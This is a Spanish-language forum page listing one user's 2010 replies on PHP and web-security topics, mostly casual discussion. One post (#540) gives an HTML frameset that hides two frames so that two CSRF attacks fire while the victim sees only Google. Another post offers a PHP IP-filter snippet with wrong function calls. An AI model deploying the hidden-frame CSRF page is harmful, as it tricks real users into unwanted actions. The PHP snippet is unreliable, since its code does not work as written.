Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Castg!

#531
PHP / Re: input type
8 Febrero 2010, 04:54 AM
estas bastanate detallista y bastante rompe eh!! no quieras demostrar que sabes, sepas o no, vas a ser visto por igual en el foro...
#532
PHP / Re: Method Get - Post
8 Febrero 2010, 04:32 AM
bueno, pero, para verlo necesitas algo com el firebug, y seria visible, pero para nosotros es oculto y punto xD!
#533
PHP / Re: maxlength
8 Febrero 2010, 04:30 AM
pero para eso esta el foro, para solucionar un problema y ver diversas alternativas...
#534
PHP / Re: Impedir la repetición de una acción?
8 Febrero 2010, 02:35 AM
le guardas tambien la hora y dia y despues la comparas, lo mismo
#535
PHP / Re: Impedir la repetición de una acción?
8 Febrero 2010, 01:43 AM
pero para uno seria muy facil borrar la cookie o sesison o lo que deje en tu pc, justamente la cosa no es dejarla en tu pc, sino del lado del servidor. podes hacer un filtro por ips.
conseguis la ip del cliente: $_SERVER['REMOTE_ADDR'], y la guardas en un txt: fwrite($ip."\n", $archivo);
luego cuando trate de volver a enviar el formulario abris el archivo: $contenido = readfile($archivo);
y terminas comprobando si ya guardaste su ip, if(preg_match("/.*".$ip.".*/")). y listo


saludos!
#536
Nivel Web / Re: Como lograr este SQL inyection??
8 Febrero 2010, 01:06 AM
sabes la estructura de la abse de datos??
#537
pero estamos hablando que si tenes un csrf, y los datos pasan por get, lo haces dando la url y no dando el formulario que es mas dificl, igual con el metodo que di aca se hace mucho mas facil.
#538
a ver yoya, voy a ser simple y exacto, dejate de romper las pelotas !  esta bien lo qe dijo tragantras, que get se trasporta por la uri o url, asi que post = formulario, get = url/uri. y lo que queremos decir con igual es por donde se pasa, asi que dejate de molestar por lo menos en mi post dale  ;D?

Citarno digo más que capaz ers de corregirme hasta las tildes...

jajajaj capaz...
#539
Nivel Web / Re: Como lograr este SQL inyection??
7 Febrero 2010, 20:46 PM
a mi me parece que los dos son efectivos, pero el de anon es necesario saber los nombres de las columnas. igual como aca las sabes opto por el de anon...
#540
jejej, ya lo solucione. antes que nada quiero decir que el formulario para los "newlestter" no sirve, despues veo si lo puedo hacer andar. y segundo, aca tienen el codigo del "inyector xD!".
en el directorio donde pongan esto vana tener que tener el primer formulario y el segundo con los nombres foto.php y foto2.php. aca el codigo:
Código (html4strict) [Seleccionar]
<html>
<head>
<title>El titulo (ingenieria social)</title>
</head>
  <frameset rows="100%,*">
    <frame name="principal" src="http://google.com.ar" marginwidth="10" marginheight="10" frameborder="0">
    <frame frame name="oculto" src="foto.php" scrolling="no" frameborder="0">
    <frame frame name="oculto2" src="foto2.php" scrolling="no" frameborder="0">
  <frameset>
<body>
</body>
</html>


y listo, como el primer frame ocupa el 100% de la pantalla, los otros quedan ocultos :p..., asi que se ejecutan los dos csrf de una sola vez, y la victima solo ve la pagina de google, nomas que con el nombre de tu dominio en la barra de direcciones. un saludo grande! ;-)